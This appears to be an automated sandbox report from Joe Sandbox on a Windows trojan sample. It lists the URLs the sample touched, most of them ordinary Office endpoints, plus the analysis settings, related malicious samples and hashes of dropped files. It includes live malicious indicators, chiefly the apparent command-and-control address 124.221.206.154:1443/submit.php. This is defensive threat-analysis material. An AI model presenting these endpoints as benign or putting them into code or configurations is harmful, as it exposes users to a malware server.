                                                          https://api.powerbi.com/v1.0/myorg/groupsE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                            		high
                                                            https://web.microsoftstream.com/video/E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                              		high
                                                              https://api.addins.store.officeppe.com/addinstemplateE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://graph.windows.netE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                		high
                                                                https://dataservice.o365filtering.com/E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://124.221.206.154/W????????????.exe, 00000003.00000002.707682885.0000025BF36AC000.00000004.00000020.00020000.00000000.sdmptrue
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://officesetup.getmicrosoftkey.comE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://analysis.windows.net/powerbi/apiE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                  		high
                                                                  https://prod-global-autodetect.acompli.net/autodetectE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://outlook.office365.com/autodiscover/autodiscover.jsonE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                    		high
                                                                    https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                      		high
                                                                      https://124.221.206.154:1443/submit.phpo????????????.exe, 00000003.00000003.650269287.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000002.707886816.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.459728313.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.455168561.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.581376031.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.561061987.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.630445997.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.565837469.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.645791258.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.468267152.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.472644248.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.625692730.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.680612251.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.450683931.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.698330034.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.463998398.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.595821118.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                        		high
                                                                        https://learningtools.onenote.com/learningtoolsapi/v2.0/GetvoicesE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                          		high
                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                            		high
                                                                            https://ncus.contentsync.E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://124.221.206.154:1443/submit.phpw????????????.exe, 00000003.00000003.533004895.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmptrue
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                              		high
                                                                              https://124.221.206.154:1443/submit.phpy????????????.exe, 00000003.00000003.528285189.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.511119713.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.550870441.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546326792.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.650269287.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000002.707886816.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.645791258.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.472644248.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.680612251.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.524018797.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.698330034.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.519760880.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.515437734.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.533004895.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.507141900.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              • Avira URL Cloud: malware
                                                                              		unknown
                                                                              https://124.221.206.154/-????????????.exe, 00000003.00000003.528285189.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.511119713.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.550870441.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546326792.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.446429982.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.459728313.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.455168561.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.581376031.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.555953821.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.561061987.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.565837469.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.468267152.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.472644248.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.450683931.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.524018797.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.519760880.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.515437734.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.463998398.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.533004895.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.507141900.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              • Avira URL Cloud: malware
                                                                              		unknown
                                                                              https://124.221.206.154:1443/submit.phpx????????????.exe, 00000003.00000002.707682885.0000025BF36AC000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              • Avira URL Cloud: malware
                                                                              		unknown
                                                                              https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                		high
                                                                                http://weather.service.msn.com/data.aspxE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                  		high
                                                                                  https://apis.live.net/v5.0/E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                    		high
                                                                                    https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                      		high
                                                                                      https://124.221.206.154:1443/0;????????????.exe, 00000003.00000003.595821118.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                      • Avira URL Cloud: malware
                                                                                      		unknown
                                                                                      https://messaging.lifecycle.office.com/E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                        		high
                                                                                        https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                          		high
                                                                                          https://124.221.206.154:1443/submit.phpI????????????.exe, 00000003.00000003.528285189.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.550870441.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546326792.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.555953821.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.561061987.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.680612251.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.524018797.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.698330034.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.519760880.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.515437734.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.533004895.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                          • Avira URL Cloud: malware
                                                                                          		unknown
                                                                                          https://management.azure.comE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                            		high
                                                                                            https://outlook.office365.comE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                              		high
                                                                                              https://wus2.contentsync.E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://incidents.diagnostics.office.comE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                		high
                                                                                                https://clients.config.office.net/user/v1.0/iosE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                  		high
                                                                                                  https://124.221.206.154:1443/submit.phpQ????????????.exe, 00000003.00000003.511119713.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.446429982.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.459728313.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.455168561.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.565837469.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.468267152.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.472644248.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.450683931.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.463998398.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.507141900.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                  • Avira URL Cloud: malware
                                                                                                  		unknown
                                                                                                  https://insertmedia.bing.office.net/odc/insertmediaE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                    		high
                                                                                                    https://o365auditrealtimeingestion.manage.office.comE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                      		high
                                                                                                      https://outlook.office365.com/api/v1.0/me/ActivitiesE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                        		high
                                                                                                        https://api.office.netE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                          		high
                                                                                                          https://incidents.diagnosticssdf.office.comE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                            		high
                                                                                                            https://asgsmsproxyapi.azurewebsites.net/E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://clients.config.office.net/user/v1.0/android/policiesE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                              		high
                                                                                                              https://entitlement.diagnostics.office.comE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                                		high
                                                                                                                https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                                  		high
                                                                                                                  https://substrate.office.com/search/api/v2/initE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                                    		high
                                                                                                                    https://124.221.206.154:1443/submit.phpc????????????.exe, 00000003.00000003.528285189.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.511119713.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.550870441.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546326792.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.650269287.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000002.707886816.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.581376031.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.555953821.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.561061987.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.630445997.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.565837469.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.645791258.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.625692730.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.680612251.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.524018797.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.698330034.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.519760880.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.515437734.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.533004895.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.595821118.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                    • Avira URL Cloud: malware
                                                                                                                    		unknown
                                                                                                                    https://outlook.office.com/E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                                      		high
                                                                                                                      https://124.221.206.154:1443/submit.phpe????????????.exe, 00000003.00000003.528285189.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.511119713.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.550870441.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.546326792.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.650269287.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.446429982.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000002.707886816.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.459728313.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.455168561.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.581376031.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.555953821.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.561061987.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.630445997.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.565837469.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.645791258.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.468267152.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.472644248.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.625692730.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.680612251.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.450683931.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmp, ????????????.exe, 00000003.00000003.524018797.0000025BF36E3000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      		unknown
                                                                                                                      https://storage.live.com/clientlogs/uploadlocationE231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                                        		high
                                                                                                                        https://outlook.office365.com/E231148E-230F-4D9C-B6F4-7F66C34B8E20.7.drfalse
                                                                                                                          		high

                                                                                                                          World Map of Contacted IPs

                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs

                                                                                                                          Public IPs

                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          124.221.206.154
                                                                                                                          		unknownChina
                                                                                                                          		45361JCN-AS-KRUlsanJung-AngBroadcastingNetworkKRtrue

                                                                                                                          General Information

                                                                                                                          Joe Sandbox Version:35.0.0 Citrine
                                                                                                                          Analysis ID:679126
                                                                                                                          Start date and time: 05/08/202209:54:362022-08-05 09:54:36 +02:00
                                                                                                                          Joe Sandbox Product:CloudBasic
                                                                                                                          Overall analysis duration:0h 8m 33s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Sample file name:1a#U77e5.exe
                                                                                                                          Cookbook file name:default.jbs
                                                                                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                          Number of analysed new started processes analysed:23
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • HDC enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal100.troj.evad.winEXE@10/8@0/1
                                                                                                                          EGA Information:
                                                                                                                          • Successful, ratio: 50%
                                                                                                                          HDC Information:
                                                                                                                          • Successful, ratio: 45.8% (good quality ratio 43%)
                                                                                                                          • Quality average: 68.2%
                                                                                                                          • Quality standard deviation: 27.6%
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 81%
                                                                                                                          • Number of executed functions: 8
                                                                                                                          • Number of non-executed functions: 132
                                                                                                                          Cookbook Comments:
                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                          • Adjust boot time
                                                                                                                          • Enable AMSI

                                                                                                                          Warnings

                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 52.109.88.191, 52.109.76.33, 52.109.12.21, 20.238.103.94, 20.223.24.244
                                                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, asf-ris-prod-neu-azsc.northeurope.cloudapp.azure.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, ris.api.iris.microsoft.com, licensing.mp.microsoft.com, rp-consumer-prod-displaycatalog-geomap.trafficmanager.net, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                          • Execution Graph export aborted for target 1a#U77e5.exe, PID 5296 because there are no executed function
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Report size getting too big, too many NtCreateFile calls found.

                                                                                                                          Simulations

                                                                                                                          Behavior and APIs

                                                                                                                          TimeTypeDescription
                                                                                                                          09:55:50API Interceptor30x Sleep call for process: ????????????.exe modified

                                                                                                                          Joe Sandbox View / Context

                                                                                                                          IPs

                                                                                                                          No context

                                                                                                                          Domains

                                                                                                                          No context

                                                                                                                          ASNs

                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                          JCN-AS-KRUlsanJung-AngBroadcastingNetworkKRSecuriteInfo.com.Linux.Siggen.9999.5381.26016Get hashmaliciousBrowse
                                                                                                                          • 182.161.213.89
                                                                                                                          j6P5rDC2J5.dllGet hashmaliciousBrowse
                                                                                                                          • 182.161.176.178
                                                                                                                          n81cC64EEr.dllGet hashmaliciousBrowse
                                                                                                                          • 124.223.229.32
                                                                                                                          k9almTwT0Q.dllGet hashmaliciousBrowse
                                                                                                                          • 124.223.124.177
                                                                                                                          j2Br89kv8Q.dllGet hashmaliciousBrowse
                                                                                                                          • 124.223.150.25
                                                                                                                          7veyezkcWb.dllGet hashmaliciousBrowse
                                                                                                                          • 124.220.169.105
                                                                                                                          wHuUrcDHlg.dllGet hashmaliciousBrowse
                                                                                                                          • 124.222.50.239
                                                                                                                          vJYhypgR4J.dllGet hashmaliciousBrowse
                                                                                                                          • 124.221.104.235
                                                                                                                          1231.exeGet hashmaliciousBrowse
                                                                                                                          • 124.223.6.231
                                                                                                                          ztKgjbhW8o.exeGet hashmaliciousBrowse
                                                                                                                          • 124.223.6.231
                                                                                                                          ZG9zm68kGet hashmaliciousBrowse
                                                                                                                          • 124.221.175.242
                                                                                                                          xd.armGet hashmaliciousBrowse
                                                                                                                          • 124.221.209.149
                                                                                                                          STD 35 GA Plan_doc.exeGet hashmaliciousBrowse
                                                                                                                          • 124.221.134.175
                                                                                                                          NYcC6fUIyrGet hashmaliciousBrowse
                                                                                                                          • 124.221.175.247
                                                                                                                          buding.exeGet hashmaliciousBrowse
                                                                                                                          • 124.223.198.130
                                                                                                                          f3cfXWeHxUGet hashmaliciousBrowse
                                                                                                                          • 182.161.201.87
                                                                                                                          New Order 56723SCF..exeGet hashmaliciousBrowse
                                                                                                                          • 124.221.134.175
                                                                                                                          miori.x86-20220630-2250Get hashmaliciousBrowse
                                                                                                                          • 182.161.250.2
                                                                                                                          mips-20220630-1413Get hashmaliciousBrowse
                                                                                                                          • 124.220.114.100
                                                                                                                          Quote.jsGet hashmaliciousBrowse
                                                                                                                          • 124.221.134.175

                                                                                                                          JA3 Fingerprints

                                                                                                                          No context

                                                                                                                          Dropped Files

                                                                                                                          No context

                                                                                                                          Created / dropped Files

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\E231148E-230F-4D9C-B6F4-7F66C34B8E20

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                          File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):148061
                                                                                                                          Entropy (8bit):5.35816450806037
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:ncQW/gxgB5BQguwN/Q9DQe+zQTk4F77nXmvid3XxVETLKz61:W1Q9DQe+zuXYr
                                                                                                                          MD5:DD89B24BAA865B152396CB932251EA2F
                                                                                                                          SHA1:D0DB98C4FE2E281C64DF4F44DF5279F34E56DB54
                                                                                                                          SHA-256:E25E7342FAD7C59D3D7E5F224BC370F1541CE3AD01FAF4C922F84F71137AF827
                                                                                                                          SHA-512:E6599769C65FE10E4E70997B37F2A343BB6169C3FD09DB837A51386BE4E5DA019AF389D1AF09DABF60A80FD45F2347F6244930AA4AEBBE31066772D048039880
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-08-05T07:55:52">.. Build: 16.0.15601.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\?????????????????????.LNK

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 5 15:55:47 2022, mtime=Fri Aug 5 15:55:52 2022, atime=Fri Aug 5 15:55:47 2022, length=16768, window=hide
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1231
                                                                                                                          Entropy (8bit):5.014235188340708
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:81t6bU9G6CHihArh3GXqDkDlM8+WABe1OW7EO/ypaZFVW7LVW7KNDyffD4t2Y+x4:81ZArsUkDuPW7EOKqW7hW7ODyR7aB6m
                                                                                                                          MD5:355E58BF021D90BF3CCDCD8503F910A1
                                                                                                                          SHA1:34D3B542D1ABDD5B042B1BF790EEBD705899BFAC
                                                                                                                          SHA-256:F40C4F240348D97AB8EB36F2DAA14F896B297339E8E2581A84AEC5AB20AB7AFD
                                                                                                                          SHA-512:5A17937914179F6E98746DC8D45C82632DA16361A5E126E9403C74AC741E3D69FBF081B14FF1DDB7FDC4948C957ED0FDEBCB9C9B069D84069A21C6A4FB488A1F
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
